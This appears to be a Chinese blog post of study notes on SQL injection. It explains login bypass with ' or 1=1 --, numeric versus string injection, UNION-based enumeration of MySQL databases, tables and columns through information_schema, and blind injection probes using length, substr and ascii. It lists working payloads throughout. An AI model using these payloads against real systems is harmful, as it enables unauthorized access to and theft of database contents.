SQL 注入漏洞浅研究学习

SQL注入漏洞:Web安全方面最高危的漏洞,SQL漏洞威胁着网站后台数据的安全问题。


 

网上常说“万能密码”,这个万能密码则就是利用了SQL注入漏洞;

' or 1=1 --

 

上述的万能密码输入在用户登录框中 ,如果把他和SQL语句拼接,就可以发现奥秘:

String sql = "Select count(*) from admin where username = ' 'or 1=1 -- ' and password = '********'

 

上述SQL语句则是我们输入万能密码后,服务器后台拼接的SQL语句;仔细观察语句,发现 ‘ or 1=1 -- 的作用就是将前面的语句闭合为空,然后or判断1=1,最用 -- 将其后的语句注释掉。由此 ‘or 1=1 -- 就可以完全的绕过SQL中的查询验证。

 

SQL漏洞的分类:

1、数字型注入漏洞:

  当输入的参数为整型时,则可以认为是数字型注入;(需要注意的是,数字型注入不需要单引号闭合哦)设定如下SQL语句环境:

select * from table where id=8 ;

 

id=8是测试的输入;如果报错则不是整型输入,若不报错则认为是整型输入;

select * from table where id=8 and 1=1

 

select * from table where id=8 and 1=2

 

如上,第一条SQL输入若返回结果和原结果无差别,第二条返回的结果可以执行但没有结果,——则可以认为该处存在数字型注入点;

 

2、字符型注入漏洞:

  当输入的参数为字符串时,(字符型输入需要单引号闭合哦)

字符型和数字型例句比较:

数字型:
    select * from table where id=8 ;
字符型:
    select * from table where username='admin'

 

字符型注入最重要的就是要闭合SQL语句和注释掉多余的SQL语句;原因解释:

在SQL语句中,字符串会被单引号给转义化,在SQL拼接我们的输入的数据的时候,
会用单引号将我们的输入内容给单引号转义化,整个输入内容都会被认为是需要查询的内容串,
由此我们需要用单引号闭合SQL拼接的单引号,而后在 -- 注释掉后面的内容(单引号)让我们的注入语句可以不被SQL拼接而导致转义化。

 

select * from username = ' ** '

 

上述为还未拼接的SQL语句,在查询处首先用单引号包含,目的就是将用户输入的内容以字符的内容形式查询;

select * from username = ' ' or 1=1 -- ' '

 

上例SQL语句则是拼接后的语句,可以观察出,’ 与之前的单引号成对,将两个单引号之间的内容闭合了,其后 or 1=1 则可以形成一个单独的非字符串的SQL功能语句, -- 注释语句可以将后面更多的碍事的SQL语句给注释掉。

## 字符型SQL注入,必须闭合单引号并注释多余的SQL语句。

——————————
https://mp.weixin.qq.com/s/vIHbtpi6eiv4ZoZ9ztyjsA

常见的mysql数据库注入姿势:(引用上方链接内容)

功能  |    查询语句

查库  | select schema_name from information_schema.schemata              |  查当前数据库中所有库名

查表  |   select table_name from information_schema.tables where table_schema = ‘库名’    | 查库中的所有表名

查列  |  select column_name from information_schema.columns where table_name = ‘表名’  |  查表中的所有列名

查数据    | select 列名  from 库名.表名                              |

mySQL内置库—— information_schema:

  其中保存有MYSQL所维护的所有数据库信息,包括库名、表名、表列、权限……等信息

Mysql内置库—— performance_schema:

  用于收集数据库服务器的性能参数

mysql内置库——mysql:

  保留mysql的账户信息、权限、存储过程、event、时区等配置信息

mysql内置库——sys:

  百度哦~~~~

 

数据库的注入一般分步骤的:

第一步:判断注入点

  我们需要判断数字型还是字符型注入类型,主要依靠or或and条件语句是否被处理(单引号闭合和语句注释非常重要)

第二部:猜解字段数

  我们需要猜出我们查询语句中的字段数;

1 ' order by 1 --     //正常
1 ' order by 2 --     //正常   
1 ' order by 3 --     //报错    

 

根据上例的SQL语句可以得出,我们查询语句中只有2个字段;

第三步:确定显示的字段

  利用 union 联合查询(回显注入) ;

第四步:获取当前数据库的库名

1 ' union select 1,database() --

 

第五步:获取数据库中的表

**  ' union select 1,table_name from information_schema.tables where table_schema = '库名'

 

第六步:获取字段名

** ' union select 1,column_name from information_schema.columns where table_name = '表名'

 

第七步:查询需求数据

——————————————————————

SQL盲注:

1、判断注入点

2、猜解当前库名

  盲注不可以利用回显注入的方式直接获得数据,但是我们可以一一猜解,猜解条件就是利用前面的真假条件:

1 ' and true #  结果为真
1 ' and false # 结果为假

 

3、获得库名长度

  盲注中获取字符串长度 length(str);由此猜解数据库名的长度。

输入 1 ' and length(database())>1 --    [结果为真表示长度大于1]
输入 1 ' and length(database())>10 --  [结果为假表示长度小于10]

 

  left(str,n)  【从左侧开始截取字符串str的前n位】

substr(expression,start,length)

获取字符串  (原始字符串 字符串开始的位置 字串长度)

 

  ASCII(a) 【将某个字符转换为ASCII值】

  mid() 函数 与 substr函数功能类似

  ord()函数 与  ASCII函数功能类似

  regexp {(select user())regexp '^r}  正则用法

常用 POC

and left(select(database()),1) = 'a' -- +
and (select database()) regexp '^r'
and (select database()) like 'r%'
and ord(mid((select database())1,1))>97
and ascii(substr((select database()),1,1))>97 [常用]

 

输入:

1'and ascii(substr((select database()),1,1))>97

 

正常返回,则表示数据库的第一个字符的ascii值大于97 ;#依次采用逐步猜解的方法就可以逐步的推断出库名了

 

4、猜解库中的表数量

and (select count(table_name) from information_schema.tables where table_schema=库名) = 数量

 

当上条SQL语句显示存在时,则当前的数量就是库中表的数量。

5、猜解表名

  第一步:猜解出表名的长度

and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=长度量  【猜解表名长度】

 

  按照上面的SQL猜解出表名的长度。

 

  第二步:猜解表名

and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))>ascii数

 

  按照上述的SQL推倒,可以逐步推演出表名。

 

6、猜解字段名

and (select count(column_name) from information_schema.columns where table_name = 表名) = 字段的数量

 

 

and length(select column_name from information_schema.columns where table_name = 表名 limit 0,1)=字段名长度

 

 


 


 

双注入查询需要理解四个函数/语句
1. Rand() //随机函数 返回0-1之间的随机数
2. Floor() //取整函数
3. Count() //汇总函数
4. Group by //分组语句

 

 


 

 SQL注入衔接学习:https://mp.weixin.qq.com/s/NKO5RbYUerhxlZtmPjxDSQ

……………………

 

posted @ 2019-06-02 22:19  Mirror王宇阳  阅读(275)  评论(0编辑  收藏